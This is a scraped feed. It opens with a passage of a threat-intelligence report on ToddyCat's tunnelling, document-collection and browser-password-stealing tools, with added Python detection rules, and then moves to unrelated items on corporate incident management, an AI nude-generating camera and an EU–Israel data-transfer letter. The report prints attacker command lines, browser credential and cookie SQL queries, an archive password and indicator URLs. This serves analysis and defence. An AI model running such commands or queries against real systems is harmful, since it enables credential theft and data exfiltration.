This starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.
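As an added example, not code from Securelist or from ToddyCat's toolset, the Python below turns the command lines quoted in this section (the scheduled-task ssh.exe -R call, a.bat's icacls changes, the curl downloads of the SoftEther files, the ngrok agent and the FRP client start) into detection rules and runs them over constructed process-creation events; the event field names host and cmdline, and the two benign control lines, are assumptions.

```python
"""Detection rules for the tunnelling tradecraft described in this section:
reverse SSH tunnel, a.bat DACL change, SoftEther fetched via curl, ngrok, FRP.
Added example, not Securelist's or ToddyCat's code; events are constructed."""
import re
from dataclasses import dataclass

# Constructed sample telemetry (field names host/cmdline are assumptions);
# indicators are as quoted in the article, defanging kept. Last two are benign.
SAMPLE_EVENTS = [
    {"host": "DC01", "cmdline": r"C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103[.]27.202.85 -p 22222 -fN"},
    {"host": "DC01", "cmdline": r'icacls "C:\Windows\AppReadiness" /remove "BUILTIN\Users"'},
    {"host": "WS07", "cmdline": r'"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe'},
    {"host": "WS07", "cmdline": r'"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --authtoken <token>"'},
    {"host": "SRV02", "cmdline": r"c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini"},
    {"host": "WS03", "cmdline": r"C:\Program Files\OpenSSH\ssh.exe -p 22 admin@fileserver.internal"},
    {"host": "WS03", "cmdline": r"curl https://example.invalid/update.json -o C:\Temp\update.json"},
]

BINARY_EXTS = {".exe", ".dll", ".se2"}
NON_KEY_EXTS = {".ini", ".dat", ".txt", ".log"}  # disguises used for OpenSSH keys


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    detail: str


def _ext(path: str) -> str:
    """Lower-case extension of a path or URL, '' when there is none."""
    m = re.search(r"(\.[a-z0-9]+)$", path.lower().strip('"'))
    return m.group(1) if m else ""


def rule_reverse_ssh_tunnel(cmd: str):
    # OpenSSH client with a remote port forward (-R is case-sensitive); note a
    # key file with a non-key extension or parked in AppReadiness.
    low = cmd.lower()
    if "ssh.exe" not in low and not re.search(r"(^|\\|\s)ssh\s", low):
        return None
    if not re.search(r"\s-R\s", cmd):
        return None
    detail = "OpenSSH client with remote port forward (-R)"
    key = re.search(r"\s-i\s+(\S+)", cmd)
    if key and (_ext(key.group(1)) in NON_KEY_EXTS or "appreadiness" in key.group(1).lower()):
        detail += f"; identity file {key.group(1)} is disguised or stored in AppReadiness"
    return ("high", detail)


def rule_appreadiness_acl_tamper(cmd: str):
    # takeown/icacls changing owner or removing DACL entries on AppReadiness (a.bat).
    low = cmd.lower()
    if "appreadiness" in low and (("icacls" in low and "/remove" in low) or "takeown" in low):
        return ("high", "ownership/DACL change on C:\\Windows\\AppReadiness")
    return None


def rule_curl_script_to_binary(cmd: str):
    # curl saving a web-content-looking URL (.js) as an executable or hamcore.se2.
    m = re.search(r"curl(?:\.exe)?\s+(\S+).*?\s-o\s+(\S+)", cmd, re.IGNORECASE)
    if m and _ext(m.group(2)) in BINARY_EXTS and _ext(m.group(1).split("?")[0]) not in BINARY_EXTS:
        return ("medium", f"curl saved {m.group(1)} as {m.group(2)}; extensions disagree")
    return None


def rule_ngrok_tcp_tunnel(cmd: str):
    # ngrok agent publishing a local TCP port through the ngrok cloud relay.
    low = cmd.lower()
    if "ngrok.io" in low or ("--remote-addr" in low and "--authtoken" in low):
        return ("high", "ngrok agent exposing a local port via cloud relay")
    return None


def rule_frp_client_ini_config(cmd: str):
    # Low confidence: renamed FRP client run as '<binary>.exe -c <config>.ini'.
    m = re.search(r"(\S+\.exe)\s+-c\s+(\S+\.ini)\s*$", cmd, re.IGNORECASE)
    if m:
        return ("low", f"{m.group(1)} started with .ini config {m.group(2)} (possible FRP client)")
    return None


RULES = {
    "reverse_ssh_tunnel": rule_reverse_ssh_tunnel,
    "appreadiness_acl_tamper": rule_appreadiness_acl_tamper,
    "curl_script_to_binary": rule_curl_script_to_binary,
    "ngrok_tcp_tunnel": rule_ngrok_tcp_tunnel,
    "frp_client_ini_config": rule_frp_client_ini_config,
}


def scan_cmdline(cmd: str) -> list:
    """Names of the rules one command line triggers, in RULES order."""
    return [name for name, fn in RULES.items() if fn(cmd)]


def scan(events) -> list:
    """Run every rule over every event and collect Finding records."""
    findings = []
    for ev in events:
        for name, fn in RULES.items():
            hit = fn(ev["cmdline"])
            if hit:
                findings.append(Finding(ev["host"], name, hit[0], hit[1]))
    return findings
```

Calling scan(SAMPLE_EVENTS) flags the five malicious lines and leaves the two benign ssh and curl controls untouched; the FRP rule is deliberately low severity because "-c something.ini" alone is a weak signal.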

Data collection tools

Cuthead for data collection


Recently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated from the “file description” field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.

Cuthead tool accepts the following arguments:
fkw.exe <date> <extensions> [keywords]

  • Date: the date when the file was last modified, in yyyyMMdd format. The search looks for files modified on that date or later
  • Extensions: a string without spaces that contains file extensions separated by semicolons
  • Keywords: a string without spaces that contains semicolon-delimited words to look for in file names

Here is an example of a cuthead launch command.
"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx
In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.

Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (T1005 Data from Local System). Folders that contain the following substrings are excluded from the search.
$
Windows
Program Files
Programdata
Application Data
Program Files (x86)
Documents and Settings
Also, the files are excluded from the search if they meet the following criteria:

  • The file size is greater than 50 MB (52428800 bytes).
  • The file extensions do not match those specified in the command-line parameters.
  • The names do not contain the keywords specified in the command-line parameters.

A list of files found by the search is passed to the function that creates ZIP archives with the password “Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 0.85.4.369 is used for creating archives (T1560.002 Archive Collected Data: Archive via Library).

Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.

WAExp: WhatsApp data stealer


This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser’s local storage files.

The executable accepts the following arguments.
app.exe [check|copy|start] [remote]

  • check: checks the presence of data on the host.
  • copy: copies data it finds to the temporary folder.
  • start: first copies the data to the temporary folder and then packs the data into an archive file.
  • remote: the name of the remote host.

When executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are searched along “\\[remote]\C$\users\“. If it is not specified, the malware uses the environment variable %SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.
All Users
Default User
Default
Public
After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.

For Chrome, the tool opens <User>\Appdata\local\Google\ and for Edge, <User>\Appdata\local\Microsoft\Edge\. Inside these, it looks for a folder with the following name inside the subfolders.
https_web.whatsapp.com_0.indexeddb.leveldb
For Mozilla, the tool opens <User>\Appdata\roaming\ and looks for a folder with the following name inside the subfolders:
https+++web.whatsapp.com
Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example, Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.

WAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird

In the image above, you can see the output of the tool running with the “check” parameter. It shows storage files for Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.

When executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.
C:\Programdata\Microsoft\Default\
The last parameter that the tool uses is “start”. It gathers target files inside a temporary folder, as described in the copy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module (T1560.002 Archive Collected Data: Archive via Library).

It saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the following path:
C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss
After that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing web.whatsapp.com data.

The image below shows an example of WAExp output when run with the various startup parameters.

WAExp output for its various command-line parameters

The operations shown above collect Chrome data and generate an archive, whose contents are shown below.

Archive file containing data stolen by WAExp

TomBerBil for stealing passwords from browsers


In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web Browsers).

There are many open-source tools available for decrypting storage data, one of these being mimikatz. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.

To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from Chrome and Edge. Both browsers use the CryptProtectData feature from DPAPI (Data Protection Application Programming Interface) to encrypt data. It protects data with the current user’s password and a special encryption master key.

All TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of explorer.exe. It identifies the process users and compiles a list.

Username identification function

The image above shows an example of the function that identifies users by process ID. It sends a WMI request to the Win32_Process class to receive an object whose processID property equals the given PID. It then calls the GetOwner method, which returns the user and domain name for the process.

After this, the malware searches for the encryption key, stored in the encrypted_key field in the following browser JSON files.
%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
It then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData function. To do this, it calls the Unprotect function from the System.Security.Cryptography.ProtectedData package, which in turn calls the CryptUnprotectData function from Windows DPAPI.

Calling the Unprotect function

The image above shows an example of the Unprotect function call, which receives an array of bytes obtained from the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.

If the decryption is successful, the malware searches for Login Data and \Network\Cookies files inside the following folders.
%LOCALAPPDATA%\Google\Chrome\User Data\Default
%LOCALAPPDATA%\Google\Chrome\User Data\Profile *
It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.
SELECT origin_url, username_value, password_value FROM logins
SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies
Data retrieved this way is decrypted with the master key and saved in special files.

Most versions of the malware tool log their actions. Below is an example of a log file that they generate:
[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM

[5516] [explorer]
[UserName][+] Impersonate user UserName
[+] Current user UserName
[+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
[+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
[+] Recvtoself
[+] Current user SYSTEM
[+] End 7/28/2023 1:12:52 PM
One of the variants mimics Kaspersky Anti-Virus: this .NET executable is named avpui.exe (T1036.005 Masquerading: Match Legitimate Name or Location) and carries matching file metadata:

Metadata of the tool pretending to be KAV

Some versions of the tool required specific command-line parameters to start. An example can be seen below:

A TomBerBil variant started with a parameter

In several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the browser's User Data folder with 7-Zip for later exfiltration:
wmic shadowcopy call create Volume='C:\'
"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\Chrome\"User Data\"
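As an added defender-side example (not code from the report or from the tool it describes), the following Python flags the two behaviours described above: a process other than the browser touching the Login Data or Network\Cookies stores listed earlier, and the shadow-copy creation and archiving commands just shown. The events, image paths and the user name alice are constructed samples in a Sysmon-like shape, not real telemetry.

```python
import re

# Constructed sample events in a Sysmon-like shape (not real telemetry): "file" events
# carry the acting process image and the file it touched, "process" events the command line.
SAMPLE_EVENTS = [
    {"type": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "image": r"C:\Windows\Temp\avpui.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "image": r"C:\Windows\Temp\avpui.exe",
     "target": r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Profile 2\Network\Cookies"},
    {"type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy call create Volume='C:\\'"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r '
                r'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\alice\AppData\Local\Google\Chrome\"User Data\"'},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

# Credential and cookie stores named in the report, under Default or any "Profile N".
BROWSER_STORE = re.compile(
    r"\\User Data\\(Default|Profile \d+)\\(Login Data|Network\\Cookies)$", re.IGNORECASE)
# Processes expected to open those stores (assumption; extend for other Chromium browsers).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}
# A shadow copy created from the command line, and a browser profile read out of one.
SHADOW_CREATE = re.compile(r"\bwmic\b.*\bshadowcopy\b.*\bcall\b.*\bcreate\b", re.IGNORECASE)
SHADOW_PROFILE = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*User Data", re.IGNORECASE)

def classify(event):
    """Return the alert names raised by one event (empty list if nothing matched)."""
    alerts = []
    if event["type"] == "file" and BROWSER_STORE.search(event["target"]):
        image = event["image"].rsplit("\\", 1)[-1].lower()
        if image not in BROWSER_IMAGES:
            alerts.append("browser-store-access-by-non-browser")
    elif event["type"] == "process":
        if SHADOW_CREATE.search(event["cmdline"]):
            alerts.append("shadow-copy-created-from-cli")
        if SHADOW_PROFILE.search(event["cmdline"]):
            alerts.append("browser-profile-read-from-shadow-copy")
    return alerts

def scan(events):
    """Map event index -> alerts for every event that raised at least one."""
    return {i: a for i, e in enumerate(events) if (a := classify(e))}

if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["image"], names)
```

Only the chrome.exe access and the plain `cmd /c dir` go unflagged; in real telemetry the file rule should also exempt backup agents that legitimately read the profile directory.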

Conclusion


We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.

To protect the organization’s infrastructure, we recommend adding the resources and IP addresses of cloud services that provide traffic tunneling to the firewall denylist. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely; unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required not to store passwords in their browsers, as this helps attackers access sensitive information, and reusing passwords across different services puts even more data at risk of falling into attackers’ hands.

Indicators of compromise



C2 addresses

103.27.202[.]85 – SSH server
118.193.40[.]42 – SoftEther VPN server
Ha[.]bbmouseme[.]com – SoftEther VPN server

Links

hxxp://www.netportal.or[.]kr/common/css/main.js – vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js – Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2 – Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe – vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 – Hamcore.se2

https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/




Corporate “incidents”: what they are and how best to manage them
https://poliverso.org/display/0477a01e-0903c053-ce65e8b37a19f5c7

In the current national business landscape, one specific trend affecting every company is increasingly evident: the tendency toward constant and continuous organizational development, often characterized by the adoption of new technologies.

This makes business processes ever more complex and, therefore, subject to risks and vulnerabilities that can have negative consequences for organizations and for their customers.

At KRUK Italia, a company operating in the debt management sector, any event that can have a negative effect on the company itself or on its customers is referred to as an “incident”. An incident can take many forms: from the interruption of IT services essential to operations to, for example, breaches of personal data as defined in Article 4 of Regulation (EU) 2016/679 (“GDPR”).

In order to handle these events promptly and effectively, KRUK Italia has built around them a consolidated and effective system that protects customers while at the same time turning each event into an opportunity for improvement.

In the incident management process, staff training is a priority phase. Every employee must be able to promptly identify situations that could constitute an incident and report them without delay to the team designated to receive and record them.

That team conducts a preliminary investigation, after which it assigns the incident to the competent section according to the risk area.

The competent section is then responsible for analyzing the assigned incident, recommending and supervising the implementation of immediate remedial actions and of preventive actions so that the same incident does not recur in the future.

Two factors are important to keep in mind in this process: the timeliness and the accuracy of the investigation.

Detecting the incident, reporting it to the competent section and the subsequent analysis of the event must take place quickly, allowing corrective actions to be implemented immediately to mitigate the impact and best protect customers.

Moreover, if the incident concerns personal data, prompt handling is an obligation under the GDPR: Article 33, entitled “Notification of a personal data breach to the supervisory authority”, requires the data controller, where there are specific risks to data subjects, to notify the competent supervisory authority without undue delay and within 72 hours of becoming aware of the breach.

The notification must include information that can only be derived from a complete investigation of the incident, such as a description of the nature of the breach, its likely consequences for data subjects, and the measures taken to remedy the breach and mitigate its possible adverse effects.

After the first investigative phase, which allows corrective actions to be taken quickly, the causes of the incident should then be examined thoroughly until its root cause is found; only by identifying and then removing the root cause is it possible to prevent similar events in the future.

At KRUK Italia, the root cause of an incident is identified using the innovative “5 Whys” methodology. The section responsible for identifying possible corrective actions asks “why” the incident occurred, tracing back to a different reason up to five consecutive times. The point at which the chain of reasons runs out coincides with the recognition of the primary triggering factor.

Unfortunately, the growth of business activity creates fertile ground for incidents to occur. For this reason, KRUK Italia has developed over the years an effective system for reporting and managing incidents that allows them to be fully resolved.

In conclusion, given the increasingly concrete possibility that incidents will keep occurring in a corporate context, it becomes important for companies to act in line with the operational approach promoted by KRUK Italia, so as to ensure timeliness and efficiency in their handling. Effective incident management not only protects customers from the negative impact of such events but also offers organizations the opportunity to turn difficulties into a process of continuous improvement.

The article Corporate “incidents”: what they are and how best to manage them comes from il blog della sicurezza informatica.




AI Camera Only Takes Nudes
https://poliverso.org/display/0477a01e-8557cd7c-adb621abed56c4c4

A pair of hands holds a digital camera. "NUCA" is written in the hood above the lens and a black grip is on the right hand side of the device (left side of image). The camera body is off-white 3D printed plastic. The background is a pastel yellow.

One of the cringier aspects of AI as we know it today has been the proliferation of deepfake technology to make nude photos of anyone you want. What if you took away the abstraction and put the faker and subject in the same space? That’s the question the NUCA camera (https://nuca.rocks/) was designed to explore. [via 404 Media]

[Mathias Vef] and [Benedikt Groß] designed the NUCA camera “with the intention of critiquing the current trajectory of AI image generation.” The camera itself is a fairly unassuming device, a 3D-printed digital camera (19.5 × 6 × 1.5 cm) with a 37 mm lens. When the camera shutter button is pressed, a nude image is generated of the subject.

The final image is generated using a mixture of the picture taken of the subject, pose data, and facial landmarks. The photo is run through a classifier which identifies features such as age, gender, body type, etc. and then uses those to generate a text prompt for Stable Diffusion. The original face of the subject is then stitched onto the nude image and aligned with the estimated pose. Many of the sample images on the project’s website show the bias toward certain beauty ideals from AI datasets.

Looking for more ways to use AI with cameras? How about this one that uses GPS to imagine a scene instead. Prefer to keep AI out of your endeavors to invade personal space? How about building your own TSA body scanner?




1/3 📣Today, EDRi & @accessnow along with 9 civil society orgs call on @EU_Justice & @VeraJourova to provide further clarity on Israel's inclusion in the adequacy review.

This decision will renew the unrestricted data transfer between the EU & Israel.

Read more: https://edri.org/our-work/open-letter-european-commissions-decision-to-allow-data-flows-to-israel-alarms-privacy-experts/


in reply to EDRi

2/3 @EU_Commission's decision to renew data transfers to Israel raises 6⃣ crucial concerns among experts.

🚨More clarity should be given on the rule of law in Israel, its data protection rules, national security provisions, onward transfers & Israel's current actions in Gaza.

in reply to EDRi

3/3 Adequacy decisions must provide a strong legal basis for data transfers & withstand scrutiny by @EUCourtPress ⚖️

We call on @EU_Commission to address our concerns in a transparent & accountable way to determine whether or not this decision should be reversed.